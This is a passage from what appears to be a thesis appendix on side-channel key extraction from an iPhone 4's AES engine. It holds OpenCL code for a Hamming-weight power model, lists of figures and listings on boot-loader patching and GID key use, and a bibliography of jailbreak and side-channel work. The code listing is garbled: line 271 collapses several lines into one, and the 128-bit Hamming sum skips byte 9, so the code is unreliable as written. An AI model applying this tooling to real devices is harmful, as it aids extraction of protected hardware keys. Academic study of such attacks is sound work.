0x857d244a,0xd2f83dbb,0xae1132f9,0xc76da129,0x1d4b2f9e,0xdcf330b2,0x0dec5286,0x77d0e3c1,0x2b6c16b3 ,0xa999b970,0x11fa4894,0x472264e9,0xa8c48cfc,0xa01a3ff0,0x56d82c7d,0x22ef9033, 106 0x87c74e49,0xd9c1d138,0x8cfea2ca,0x98360bd4,0xa6cf81f5,0xa528de7a,0xda268eb7,0x3fa4bfad,0x2ce49d3a ,0x500d9278,0x6a9bcc5f,0x5462467e,0xf6c2138d,0x90e8b8d8,0x2e5ef739,0x82f5afc3, 107 0x9fbe805d,0x697c93d0,0x6fa92dd5,0xcfb31225,0xc83b99ac,0x10a77d18,0xe86e639c,0xdb7bbb3b,0xcd097826 ,0x6ef41859,0xec01b79a,0x83a89a4f,0xe6656e95,0xaa7ee6ff,0x2108cfbc,0xefe6e815, 108 0xbad99be7,0x4ace366f,0xead4099f,0x29d67cb0,0x31afb2a4,0x2a31233f,0xc63094a5,0x35c066a2,0x7437bc4e 92 BCode

,0xfca6ca82,0xe0b0d090,0x3315d8a7,0xf14a9804,0x41f7daec,0x7f0e50cd,0x172ff691, 109 0x768dd64d,0x434db0ef,0xcc544daa,0xe4df0496,0x9ee3b5d1,0x4c1b886a,0xc1b81f2c,0x467f5165,0x9d04ea5e ,0x015d358c,0xfa737487,0xfb2e410b,0xb35a1d67,0x9252d2db,0xe9335610,0x6d1347d6, 110 0x9a8c61d7,0x377a0ca1,0x598e14f8,0xeb893c13,0xceee27a9,0xb735c961,0xe1ede51c,0x7a3cb147,0x9c59dfd2 ,0x553f73f2,0x1879ce14,0x73bf37c7,0x53eacdf7,0x5f5baafd,0xdf146f3d,0x7886db44, 111 0xca81f3af,0xb93ec468,0x382c3424,0xc25f40a3,0x1672c31d,0xbc0c25e2,0x288b493c,0xff41950d,0x397101a8 ,0x08deb30c,0xd89ce4b4,0x6490c156,0x7b6184cb,0xd570b632,0x48745c6c,0xd04257b8}; 112 113 __constant uint IK0[256] = { 114 0x00000000,0x0b0d090e,0x161a121c,0x1d171b12,0x2c342438,0x27392d36,0x3a2e3624,0x31233f2a,0x58684870 ,0x5365417e,0x4e725a6c,0x457f5362,0x745c6c48,0x7f516546,0x62467e54,0x694b775a, 115 0xb0d090e0,0xbbdd99ee,0xa6ca82fc,0xadc78bf2,0x9ce4b4d8,0x97e9bdd6,0x8afea6c4,0x81f3afca,0xe8b8d890 ,0xe3b5d19e,0xfea2ca8c,0xf5afc382,0xc48cfca8,0xcf81f5a6,0xd296eeb4,0xd99be7ba, 116 0x7bbb3bdb,0x70b632d5,0x6da129c7,0x66ac20c9,0x578f1fe3,0x5c8216ed,0x41950dff,0x4a9804f1,0x23d373ab ,0x28de7aa5,0x35c961b7,0x3ec468b9,0x0fe75793,0x04ea5e9d,0x19fd458f,0x12f04c81, 117 0xcb6bab3b,0xc066a235,0xdd71b927,0xd67cb029,0xe75f8f03,0xec52860d,0xf1459d1f,0xfa489411,0x9303e34b ,0x980eea45,0x8519f157,0x8e14f859,0xbf37c773,0xb43ace7d,0xa92dd56f,0xa220dc61, 118 0xf66d76ad,0xfd607fa3,0xe07764b1,0xeb7a6dbf,0xda595295,0xd1545b9b,0xcc434089,0xc74e4987,0xae053edd ,0xa50837d3,0xb81f2cc1,0xb31225cf,0x82311ae5,0x893c13eb,0x942b08f9,0x9f2601f7, 119 0x46bde64d,0x4db0ef43,0x50a7f451,0x5baafd5f,0x6a89c275,0x6184cb7b,0x7c93d069,0x779ed967,0x1ed5ae3d ,0x15d8a733,0x08cfbc21,0x03c2b52f,0x32e18a05,0x39ec830b,0x24fb9819,0x2ff69117, 120 0x8dd64d76,0x86db4478,0x9bcc5f6a,0x90c15664,0xa1e2694e,0xaaef6040,0xb7f87b52,0xbcf5725c,0xd5be0506 ,0xdeb30c08,0xc3a4171a,0xc8a91e14,0xf98a213e,0xf2872830,0xef903322,0xe49d3a2c, 121 0x3d06dd96,0x360bd498,0x2b1ccf8a,0x2011c684,0x1132f9ae,0x1a3ff0a0,0x0728ebb2,0x0c25e2bc,0x656e95e6 ,0x6e639ce8,0x737487fa,0x78798ef4,0x495ab1de,0x4257b8d0,0x5f40a3c2,0x544daacc, 122 0xf7daec41,0xfcd7e54f,0xe1c0fe5d,0xeacdf753,0xdbeec879,0xd0e3c177,0xcdf4da65,0xc6f9d36b,0xafb2a431 ,0xa4bfad3f,0xb9a8b62d,0xb2a5bf23,0x83868009,0x888b8907,0x959c9215,0x9e919b1b, 123 0x470a7ca1,0x4c0775af,0x51106ebd,0x5a1d67b3,0x6b3e5899,0x60335197,0x7d244a85,0x7629438b,0x1f6234d1 ,0x146f3ddf,0x097826cd,0x02752fc3,0x335610e9,0x385b19e7,0x254c02f5,0x2e410bfb, 124 0x8c61d79a,0x876cde94,0x9a7bc586,0x9176cc88,0xa055f3a2,0xab58faac,0xb64fe1be,0xbd42e8b0,0xd4099fea ,0xdf0496e4,0xc2138df6,0xc91e84f8,0xf83dbbd2,0xf330b2dc,0xee27a9ce,0xe52aa0c0, 125 0x3cb1477a,0x37bc4e74,0x2aab5566,0x21a65c68,0x10856342,0x1b886a4c,0x069f715e,0x0d927850,0x64d90f0a ,0x6fd40604,0x72c31d16,0x79ce1418,0x48ed2b32,0x43e0223c,0x5ef7392e,0x55fa3020, 126 0x01b79aec,0x0aba93e2,0x17ad88f0,0x1ca081fe,0x2d83bed4,0x268eb7da,0x3b99acc8,0x3094a5c6,0x59dfd29c ,0x52d2db92,0x4fc5c080,0x44c8c98e,0x75ebf6a4,0x7ee6ffaa,0x63f1e4b8,0x68fcedb6, 127 0xb1670a0c,0xba6a0302,0xa77d1810,0xac70111e,0x9d532e34,0x965e273a,0x8b493c28,0x80443526,0xe90f427c ,0xe2024b72,0xff155060,0xf418596e,0xc53b6644,0xce366f4a,0xd3217458,0xd82c7d56, 128 0x7a0ca137,0x7101a839,0x6c16b32b,0x671bba25,0x5638850f,0x5d358c01,0x40229713,0x4b2f9e1d,0x2264e947 ,0x2969e049,0x347efb5b,0x3f73f255,0x0e50cd7f,0x055dc471,0x184adf63,0x1347d66d, 129 0xcadc31d7,0xc1d138d9,0xdcc623cb,0xd7cb2ac5,0xe6e815ef,0xede51ce1,0xf0f207f3,0xfbff0efd,0x92b479a7 ,0x99b970a9,0x84ae6bbb,0x8fa362b5,0xbe805d9f,0xb58d5491,0xa89a4f83,0xa397468d 130 }; 131 132 #define INV_SUBROUND_0 \ 133 w[0] = T0_inv[ptextAddkey[0]]^T1_inv[ptextAddkey[13]] ^ T2_inv[ptextAddkey[10]] ^ T3_inv [ptextAddkey[7]]\ 134 ^ IK0[aeskey[(14-i)*16 + 0 ]] \ 135 ^((IK0[aeskey[(14-i)*16 + 1 ]]<<8 ) ^ (IK0[aeskey[(14-i)*16 + 1]]>>24)) \ 136 ^((IK0[aeskey[(14-i)*16 + 2 ]]<<16) ^ (IK0[aeskey[(14-i)*16 + 2]]>>16)) \ 137 ^((IK0[aeskey[(14-i)*16 + 3 ]]<<24) ^ (IK0[aeskey[(14-i)*16 + 3]]>>8)) 138 139 #define INV_SUBROUND_1 \ 140 w[1] = T0_inv[ptextAddkey[4]]^T1_inv[ptextAddkey[1]]^T2_inv[ptextAddkey[14]] ^ T3_inv [ptextAddkey[11]] \ 141 ^ IK0[aeskey[(14-i)*16 + 4 ]] \ 142 ^((IK0[aeskey[(14-i)*16 + 5 ]]<<8 ) ^ (IK0[aeskey[(14-i)*16 + 5]]>>24)) \ 143 ^((IK0[aeskey[(14-i)*16 + 6 ]]<<16) ^ (IK0[aeskey[(14-i)*16 + 6]]>>16)) \ 144 ^((IK0[aeskey[(14-i)*16 + 7 ]]<<24) ^ (IK0[aeskey[(14-i)*16 + 7]]>>8)) 145 146 #define INV_SUBROUND_2 \ 147 w[2] = T0_inv[ptextAddkey[8]]^T1_inv[ptextAddkey[5]]^T2_inv[ptextAddkey[2]]^T3_inv [ptextAddkey[15]] \ 93

148 ^ IK0[aeskey[(14-i)*16 + 8 ]] \ 149 ^((IK0[aeskey[(14-i)*16 + 9 ]]<<8 ) ^ (IK0[aeskey[(14-i)*16 + 9]]>>24)) \ 150 ^((IK0[aeskey[(14-i)*16 + 10]]<<16) ^ (IK0[aeskey[(14-i)*16 + 10]]>>16)) \ 151 ^((IK0[aeskey[(14-i)*16 + 11]]<<24) ^ (IK0[aeskey[(14-i)*16 + 11]]>>8)) 152 153 #define INV_SUBROUND_3 \ 154 w[3] = T0_inv[ptextAddkey[12]] ^ T1_inv[ptextAddkey[ 9]] ^ T2_inv[ptextAddkey[ 6]] ^ T3_inv [ptextAddkey[3]]\ 155 ^ IK0[aeskey[(14-i)*16 + 12 ]] \ 156 ^((IK0[aeskey[(14-i)*16 + 13]]<<8 ) ^ (IK0[aeskey[(14-i)*16 + 13]]>>24)) \ 157 ^((IK0[aeskey[(14-i)*16 + 14]]<<16) ^ (IK0[aeskey[(14-i)*16 + 14]]>>16)) \ 158 ^((IK0[aeskey[(14-i)*16 + 15]]<<24) ^ (IK0[aeskey[(14-i)*16 + 15]]>>8)) \ 159 160 161 __constant uchar sbox[256] = { 162 0x63,0x7C,0x77,0x7B,0xF2,0x6B,0x6F,0xC5,0x30,0x01,0x67,0x2B,0xFE,0xD7,0xAB,0x76, 163 0xCA,0x82,0xC9,0x7D,0xFA,0x59,0x47,0xF0,0xAD,0xD4,0xA2,0xAF,0x9C,0xA4,0x72,0xC0, 164 0xB7,0xFD,0x93,0x26,0x36,0x3F,0xF7,0xCC,0x34,0xA5,0xE5,0xF1,0x71,0xD8,0x31,0x15, 165 0x04,0xC7,0x23,0xC3,0x18,0x96,0x05,0x9A,0x07,0x12,0x80,0xE2,0xEB,0x27,0xB2,0x75, 166 0x09,0x83,0x2C,0x1A,0x1B,0x6E,0x5A,0xA0,0x52,0x3B,0xD6,0xB3,0x29,0xE3,0x2F,0x84, 167 0x53,0xD1,0x00,0xED,0x20,0xFC,0xB1,0x5B,0x6A,0xCB,0xBE,0x39,0x4A,0x4C,0x58,0xCF, 168 0xD0,0xEF,0xAA,0xFB,0x43,0x4D,0x33,0x85,0x45,0xF9,0x02,0x7F,0x50,0x3C,0x9F,0xA8, 169 0x51,0xA3,0x40,0x8F,0x92,0x9D,0x38,0xF5,0xBC,0xB6,0xDA,0x21,0x10,0xFF,0xF3,0xD2, 170 0xCD,0x0C,0x13,0xEC,0x5F,0x97,0x44,0x17,0xC4,0xA7,0x7E,0x3D,0x64,0x5D,0x19,0x73, 171 0x60,0x81,0x4F,0xDC,0x22,0x2A,0x90,0x88,0x46,0xEE,0xB8,0x14,0xDE,0x5E,0x0B,0xDB, 172 0xE0,0x32,0x3A,0x0A,0x49,0x06,0x24,0x5C,0xC2,0xD3,0xAC,0x62,0x91,0x95,0xE4,0x79, 173 0xE7,0xC8,0x37,0x6D,0x8D,0xD5,0x4E,0xA9,0x6C,0x56,0xF4,0xEA,0x65,0x7A,0xAE,0x08, 174 0xBA,0x78,0x25,0x2E,0x1C,0xA6,0xB4,0xC6,0xE8,0xDD,0x74,0x1F,0x4B,0xBD,0x8B,0x8A, 175 0x70,0x3E,0xB5,0x66,0x48,0x03,0xF6,0x0E,0x61,0x35,0x57,0xB9,0x86,0xC1,0x1D,0x9E, 176 0xE1,0xF8,0x98,0x11,0x69,0xD9,0x8E,0x94,0x9B,0x1E,0x87,0xE9,0xCE,0x55,0x28,0xDF, 177 0x8C,0xA1,0x89,0x0D,0xBF,0xE6,0x42,0x68,0x41,0x99,0x2D,0x0F,0xB0,0x54,0xBB,0x16}; 178 179 180 inline uchar hamming_weight(uchar c){ 181 // From Advances in Visual Computing: 4th International Symposium, ISVC 2008 182 uchar d = c &0b01010101; 183 uchar e =(c >> 1) & 0b01010101; 184 uchar f = d+e; 185 uchar g = f &0b00110011; 186 uchar h =(f >> 2) & 0b00110011; 187 uchar i = g+h; 188 uchar j = i &0b00001111; 189 uchar k =(i >> 4) & 0b00001111; 190 191 return j + k; 192 } 193 194 inline uchar hamming_weight_p128(const uchar s[16]){ 195 return 196 hamming_weight(s[0])+ 197 hamming_weight(s[1])+ 198 hamming_weight(s[2])+ 199 hamming_weight(s[3])+ 200 hamming_weight(s[4])+ 201 hamming_weight(s[5])+ 202 hamming_weight(s[ 6]) + 203 hamming_weight(s[7])+ 204 hamming_weight(s[8])+ 205 hamming_weight(s[10]) + 206 hamming_weight(s[11]) + 207 hamming_weight(s[12]) + 208 hamming_weight(s[13]) + 94 BCode

209 hamming_weight(s[14]) + 210 hamming_weight(s[15]); 211 } 212 213 inline void MixColumns(uchar* state){ 214 #define xtime(x) ((x<<1) ^ (((x>>7) & 1) * 0x1b)) 215 uchar Tmp, Tm, t; 216 for (uchar i =0;i <4;++i) 217 { 218 t = state[i*4+0]; 219 Tmp = state[i*4+0] ^ state[i*4+1] ^ state[i*4+2] ^ state[i*4+3] ; 220 Tm = state[i*4+0] ^ state[i*4+1] ; Tm = xtime(Tm); state[i*4+0] ^= Tm ^ Tmp ; 221 Tm = state[i*4+1] ^ state[i*4+2] ; Tm = xtime(Tm); state[i*4+1] ^= Tm ^ Tmp ; 222 Tm = state[i*4+2] ^ state[i*4+3] ; Tm = xtime(Tm); state[i*4+2] ^= Tm ^ Tmp ; 223 Tm = state[i*4+3] ^ t ; Tm = xtime(Tm); state[i*4+3] ^= Tm ^ Tmp ; 224 } 225 } 226 227 #define Multiply(x, y) \ 228 (((y &1)*x)^ \ 229 ((y>>1 & 1) * xtime(x)) ^ \ 230 ((y>>2 & 1) * xtime(xtime(x))) ^ \ 231 ((y>>3 & 1) * xtime(xtime(xtime(x)))) ^ \ 232 ((y>>4 & 1) * xtime(xtime(xtime(xtime(x)))))) \ 233 234 inline void InvMixColumns(uchar* state){ 235 uchar a, b, c, d; 236 for (uchar i =0;i <4;++i) 237 { 238 a = state[i*4+0]; 239 b = state[i*4+1]; 240 c = state[i*4+2]; 241 d = state[i*4+3]; 242 243 state[i*4+0] = Multiply(a,0x0e)^Multiply(b,0x0b)^Multiply(c,0x0d)^Multiply(d,0x09); 244 state[i*4+1] = Multiply(a,0x09)^Multiply(b,0x0e)^Multiply(c,0x0b)^Multiply(d,0x0d); 245 state[i*4+2] = Multiply(a,0x0d)^Multiply(b,0x09)^Multiply(c,0x0e)^Multiply(d,0x0b); 246 state[i*4+3] = Multiply(a,0x0b)^Multiply(b,0x0d)^Multiply(c,0x09)^Multiply(d,0x0e); 247 } 248 } 249 250 inline uchar powermodel(__global const struct MeasurementStructure *msm){ 251 uchar ptextAddkey[16]; 252 ptextAddkey[0]=msm->Input[0]^aeskey[16*14 + 0]; 253 ptextAddkey[1]=msm->Input[1]^aeskey[16*14 + 1]; 254 ptextAddkey[2]=msm->Input[2]^aeskey[16*14 + 2]; 255 ptextAddkey[3]=msm->Input[3]^aeskey[16*14 + 3]; 256 ptextAddkey[4]=msm->Input[4]^aeskey[16*14 + 4]; 257 ptextAddkey[5]=msm->Input[5]^aeskey[16*14 + 5]; 258 ptextAddkey[ 6] = msm->Input[ 6] ^ aeskey[16*14 + 6]; 259 ptextAddkey[7]=msm->Input[7]^aeskey[16*14 + 7]; 260 ptextAddkey[8]=msm->Input[8]^aeskey[16*14 + 8]; 261 ptextAddkey[ 9] = msm->Input[ 9] ^ aeskey[16*14 + 9]; 262 ptextAddkey[10] = msm->Input[10] ^ aeskey[16*14 + 10]; 263 ptextAddkey[11] = msm->Input[11] ^ aeskey[16*14 + 11]; 264 ptextAddkey[12] = msm->Input[12] ^ aeskey[16*14 + 12]; 265 ptextAddkey[13] = msm->Input[13] ^ aeskey[16*14 + 13]; 266 ptextAddkey[14] = msm->Input[14] ^ aeskey[16*14 + 14]; 267 ptextAddkey[15] = msm->Input[15] ^ aeskey[16*14 + 15]; 268 269 uint w[4] = {0}; 270 95

271 for (int i=1; iOutput[0]; 281 ptextAddkey[1]^=msm->Output[1]; 282 ptextAddkey[2]^=msm->Output[2]; 283 ptextAddkey[3]^=msm->Output[3]; 284 ptextAddkey[4]^=msm->Output[4]; 285 ptextAddkey[5]^=msm->Output[5]; 286 ptextAddkey[ 6] ^= msm->Output[ 6]; 287 ptextAddkey[7]^=msm->Output[7]; 288 ptextAddkey[8]^=msm->Output[8]; 289 ptextAddkey[ 9] ^= msm->Output[ 9]; 290 ptextAddkey[10] ^= msm->Output[10]; 291 ptextAddkey[11] ^= msm->Output[11]; 292 ptextAddkey[12] ^= msm->Output[12]; 293 ptextAddkey[13] ^= msm->Output[13]; 294 ptextAddkey[14] ^= msm->Output[14]; 295 ptextAddkey[15] ^= msm->Output[15]; 296 #else 297 ptextAddkey[0]^=msm->Output[0]^msm->_shiftp[AES_BLOCK_SELECTOR*16 -16 + 0]; 298 ptextAddkey[1]^=msm->Output[1]^msm->_shiftp[AES_BLOCK_SELECTOR*16 -16 + 1]; 299 ptextAddkey[2]^=msm->Output[2]^msm->_shiftp[AES_BLOCK_SELECTOR*16 -16 + 2]; 300 ptextAddkey[3]^=msm->Output[3]^msm->_shiftp[AES_BLOCK_SELECTOR*16 -16 + 3]; 301 ptextAddkey[4]^=msm->Output[4]^msm->_shiftp[AES_BLOCK_SELECTOR*16 -16 + 4]; 302 ptextAddkey[5]^=msm->Output[5]^msm->_shiftp[AES_BLOCK_SELECTOR*16 -16 + 5]; 303 ptextAddkey[ 6] ^= msm->Output[ 6] ^ msm->_shiftp[AES_BLOCK_SELECTOR*16 -16 + 6]; 304 ptextAddkey[7]^=msm->Output[7]^msm->_shiftp[AES_BLOCK_SELECTOR*16 -16 + 7]; 305 ptextAddkey[8]^=msm->Output[8]^msm->_shiftp[AES_BLOCK_SELECTOR*16 -16 + 8]; 306 ptextAddkey[ 9] ^= msm->Output[ 9] ^ msm->_shiftp[AES_BLOCK_SELECTOR*16 -16 + 9]; 307 ptextAddkey[10] ^= msm->Output[10] ^ msm->_shiftp[AES_BLOCK_SELECTOR*16 -16 +10]; 308 ptextAddkey[11] ^= msm->Output[11] ^ msm->_shiftp[AES_BLOCK_SELECTOR*16 -16 +11]; 309 ptextAddkey[12] ^= msm->Output[12] ^ msm->_shiftp[AES_BLOCK_SELECTOR*16 -16 +12]; 310 ptextAddkey[13] ^= msm->Output[13] ^ msm->_shiftp[AES_BLOCK_SELECTOR*16 -16 +13]; 311 ptextAddkey[14] ^= msm->Output[14] ^ msm->_shiftp[AES_BLOCK_SELECTOR*16 -16 +14]; 312 ptextAddkey[15] ^= msm->Output[15] ^ msm->_shiftp[AES_BLOCK_SELECTOR*16 -16 +15]; 313 #endif 314 }else{ 315 *(uint*)&ptextAddkey[0]^=w[0]; 316 *(uint*)&ptextAddkey[4]^=w[1]; 317 *(uint*)&ptextAddkey[8]^=w[2]; 318 *(uint*)&ptextAddkey[12] ^= w[3]; 319 } 320 break; 321 } 322 323 *(uint*)&ptextAddkey[0]=w[0]; 324 *(uint*)&ptextAddkey[4]=w[1]; 325 *(uint*)&ptextAddkey[8]=w[2]; 326 *(uint*)&ptextAddkey[12] = w[3]; 327 } 328 329 return hamming_weight_p128(ptextAddkey); 330 }

Listing B.5: OpenCL source code for leaking power model

List of Figures

2.1 Overview of Physical attacks ...... 7 2.2 CMOSinverter[Wika] ...... 9 2.3 Logic gates[Wikb] ...... 10

3.1 iPhone 4 mainboard with and without metal shielding ...... 19 3.2 30 pin iPhone connector with UART exposed ...... 20 3.3 ExposingiPhoneGPIOpins...... 20 3.4 iPhone 4 mainboard with battery connector removed ...... 21 3.5 iPhone 4 mainboard mounted on a stage ...... 21 3.6 LeCroy WaveRunner 8254M oscilloscope ...... 22

5.6 Power model notation ...... 34 5.7 Testedpowermodels...... 34 5.8 Additional large power models ...... 35 5.1 Traces for dierent number of blocks being decrypted in AES256-CBC mode 43 5.2 Multiple AES decryption traces of dierent number of block plotted on top of each other ...... 44 5.3 AESdecryptiontimings ...... 44 5.4 Non-Specifict-testplots ...... 45 5.5 Signal-to-Noise Ratio using the hamming weight of the 6th ciphertext/- plaintextbyteaspowermodel...... 46 5.9 Correlation traces of leaking power model computed for round 0-14 for multipleblocks ...... 47 5.10 Correlation traces of smaller hamming models computed for round 1-14 of block2...... 48 5.11 3D heatmap of the SoC plotting highest correlation in time over physical space using the leaking 128-bit power model ...... 49 5.12 EM probe positioning on the SoC based on heatmap analysis ...... 49 5.13 Correlation traces for known key ...... 50 5.14 Visualizing highest correlation values for each key byte in the known key correlation trace ...... 50 5.15 Correlation over keys for key byte index 8 and 5 of known key measurements 50 5.16 Correlation over time with the highest peak for byte index 10 of the target key starting from sample 11Õ000 ...... 51 5.17 Correlation over keys for target key bytes of the fifth decryption block . . 51 5.18 Correlation over keys for close by samples for target key byte index 4 of the fifth block ...... 52 98 List of Figures

5.19 Correlation over keys for target key byte index 4 of the second decryption block...... 52 5.20 Correlation over traces for bytes of the fifth block of target key decryptions 53

6.1 500 traces plotted after each alignment step ...... 61 6.2 Mean trace processing during automatic alignment ...... 62 List of Listings

4.1 Using jtool to extract certain sections of a Mach-O file ...... 25 4.2 Assembly of boot loaders AES engine invocation ...... 26 4.3 AESfunctionreplacementcode ...... 27

5.1 Using the GID key to get the kernel encryption key for iPhone3,2 iOS 7.1.2 build 11D257 ...... 42

B.1 Patching boot loader images ...... 67 B.2 Loading patched boot loader images and payload ...... 68 B.3 Combining sections to raw executable ...... 69 B.4 Sourcecodefordevicepayload ...... 70 B.5 OpenCLsourcecodeforleakingpowermodel ...... 89

Bibliography

[AARR03] Dakshi Agrawal, Bruce Archambeault, Josyula R. Rao, and Pankaj Rohatgi. The em side—channel(s). In Burton S. Kaliski, çetin K. Koç, and Christof Paar, editors, Cryptographic Hardware and Embedded Systems - CHES 2002, pages 29–45, Berlin, Heidelberg, 2003. Springer Berlin Heidelberg.

[App] Apple. OS X ABI Mach-O File Format Reference. https: //github.com/aidansteele/osx-abi-macho-file-format-reference/ blob/master/Mach-O_File_Format.pdf. Accessed on 2020-04-19.

[ARM] ARM. ARM7TDMI Technical Reference Manual, revision: r4p1. http:// infocenter.arm.com/help/topic/com.arm.doc.ddi0210c/DDI0210B.pdf. Accessed on 2020-05-08.

[@ax] @axi0mX. ipwndfu - github. https://github.com/axi0mX/ipwndfu.Ac- cessed on 2020-05-08.

[BCHC09] Jacob Benesty, Jingdong Chen, Yiteng Huang, and Israel Cohen. Pearson Cor- relation Coecient, pages 1–4. Springer Berlin Heidelberg, Berlin, Heidelberg, 2009.

[cla] Clang compiler. https://clang.llvm.org/. Accessed on 2020-04-19.

[Coh03] Bram Cohen. Incentives build robustness in bittorrent. http://citeseer. ist.psu.edu/cohen03incentives.html, 2003.

[@de16] @derrek, @nedwill, @naehrwert. Nintendo Hacking 20169. https://media. ccc.de/v/33c3-8344-nintendo_hacking_2016#t=1101, 2016.

[DR02] Joan Daemen and Vincent Rijmen. The Design of Rijndael: AES - The Advanced Encryption Standard. 2002.

[Ess] Stefan Esser. iPhone UART cable. https://media.blackhat.com/ bh-us-11/Esser/BH_US_11_Esser_Exploiting_The_iOS_Kernel_Slides. pdf. Accessed on 2020-04-19.

[Fra] Steven De Franco. iBoot32Patcher - github. https://github.com/iH8sn0w/ iBoot32Patcher. Accessed on 2020-04-19.

[FT2] FT232RL USB to Serial Breakout Board - robotshop. https:// www.robotshop.com/en/ft232rl-usb-serial-breakout-board.html.Ac- cessed on 2020-04-19. 102 Bibliography

[Hil] Joshua Hill. SHAttered Dreams - Adventures in BootROM Land. http://conference.hitb.org/hitbsecconf2013kul/materials/ D2T1%20-%20Joshua%20%27p0sixninja%27%20Hill%20-%20SHAttered% 20Dreams.pdf. Accessed on 2020-04-19. [Inta] The Intercept. CIA leaked document decap. https://theintercept.com/document/2015/03/10/ secure-key-extraction-physical-de-processing-apples-a4-processor/. Accessed on 2020-04-15. [Intb] The Intercept. CIA leaked document DPA. https://theintercept.com/document/2015/03/10/ differential-power-analysis-apple-a4-processor/. Accessed on 2020-04-15. [Intc] The Intercept. The CIA campain to steal ap- ple’s secrets. https://theintercept.com/2015/03/10/ ispy-cia-campaign-steal-apples-secrets/. Accessed on 2020-04- 15. [ios] iOS Security - May 2012. https://github.com/0xmachos/ iOS-Security-Guides/blob/master/iOS_Security_Guide_May12.pdf. Accessed on 2020-04-19. [joh] johang. btfs - github. https://github.com/johang/btfs. Accessed on 2020-04-19. [Khr11] Khronos OpenCL Working Group. The OpenCL Specification, Version 1.1, 2011. [KJJ99] Paul Kocher, Joshua Jae, and Benjamin Jun. Dierential power analysis. In Michael Wiener, editor, Advances in Cryptology — CRYPTO’ 99, pages 388–397, Berlin, Heidelberg, 1999. Springer Berlin Heidelberg. [Lev] Jonathan Levin. jtool. http://www.newosxbook.com/tools/jtool.html. Accessed on 2020-04-19. [liba] libfuse. libfuse - github. https://github.com/libfuse/libfuse.Accessed on 2020-04-19. [libb] libimobiledevice. libirecovery - github. https://github.com/ libimobiledevice/libirecovery. Accessed on 2020-04-19. [Lom11] Chris Lomont. Introduction to intel advanced vector extensions. intel white pa- per. https://software.intel.com/content/dam/develop/external/us/ en/documents/intro-to-intel-avx-183287.pdf, 2011. [Lu19] Yifan Lu. Injecting software vulnerabilities with voltage glitching. https: //arxiv.org/pdf/1903.08102.pdf, 2019. Bibliography 103

[MKP12] Amir Moradi, Markus Kasper, and Christof Paar. Black-box side-channel attacks highlight the importance of countermeasures. In Orr Dunkelman, editor, Topics in Cryptology – CT-RSA 2012, pages 1–18, Berlin, Heidelberg, 2012. Springer Berlin Heidelberg.

[MMP11] A. Moradi, O. Mischke, and C. Paar. Practical evaluation of dpa countermea- sures on reconfigurable hardware. In 2011 IEEE International Symposium on Hardware-Oriented Security and Trust, pages 154–160, 2011.

[MRSS18] Amir Moradi, Bastian Richter, Tobias Schneider, and François-Xavier Stan- daert. Leakage detection with the x2-test. IACR Transactions on Crypto- graphic Hardware and Embedded Systems, 2018(1):209–237, Feb. 2018.

[NVI10] NVIDIA Corporation. NVIDIA CUDA C programming guide, 2010. Version 3.2.

[pod] PodBreakout - sparkfun. https://www.sparkfun.com/products/retired/ 10645. Accessed on 2020-04-19.

[SM15] Tobias Schneider and Amir Moradi. Leakage assessment methodology - a clear roadmap for side-channel evaluations. Cryptology ePrint Archive, Report 2015/207, 2015. https://eprint.iacr.org/2015/207.

[SMG15] Tobias Schneider, Amir Moradi, and Tim Güneysu. Robust and one-pass parallel computation of correlation-based attacks at arbitrary order - extended version. Cryptology ePrint Archive, Report 2015/571, 2015. https://eprint. iacr.org/2015/571.

[tea] Chronic-Dev team. Cyanide /ibss payload development toolkit - github. https://github.com/Chronic-Dev/cyanide. Accessed on 2020-04-19.

[Thea] The iPhone Wiki. Devicetree. https://www.theiphonewiki.com/wiki/ DeviceTree. Accessed on 2020-04-15.

[Theb] The iPhone Wiki. GID Key. https://www.theiphonewiki.com/wiki/GID_ Key. Accessed on 2020-04-15.

[Thec] The iPhone Wiki. IMG3 File Format. https://www.theiphonewiki.com/ wiki/IMG3_File_Format. Accessed on 2020-04-15.

[Thed] The iPhone Wiki. limera1n exploit. https://www.theiphonewiki.com/ wiki/Limera1n_Exploit. Accessed on 2020-04-15.

[Thee] The iPhone Wiki. Sochi 11D257 (iPhone3,2) decryption keys. https:// www.theiphonewiki.com/wiki/Sochi_11D257_(iPhone3,2). Accessed on 2020-04-19. 104 Bibliography

[@ti] @tihmstar. Modern post exploitation techniques. http://blog.tihmstar. net/2018/01/modern-post-exploitation-techniques.html. Accessed on 2020-04-19.

[Wan] David Wang. xpwn - github. https://github.com/planetbeing/xpwn. Accessed on 2020-04-19.

[Wel47] B. L. Welch. The generalization of ‘student’s’ problem when several dierent population variances are involved. Biometrika, 34(1/2):28–35, 1947.

[WFE] John L. Smith Walter L. Tuchman William F. Ehrsam, Carl H. W. Meyer. Message verification and transmission error detection by block chaining.

[Wika] Wikipedia. CMOS inverter image. https://en.wikipedia.org/wiki/CMOS# /media/File:CMOS_inverter.svg. Accessed on 2020-04-19.

[Wikb] Wikipedia. Logic gates. https://en.wikipedia.org/wiki/Glitch_ removal#/media/File:Digital_circuit.JPG. Accessed on 2020-04-19.

[Xco] Xcode - . https://apps.apple.com/us/app/xcode/ id497799835. Accessed on 2020-04-19.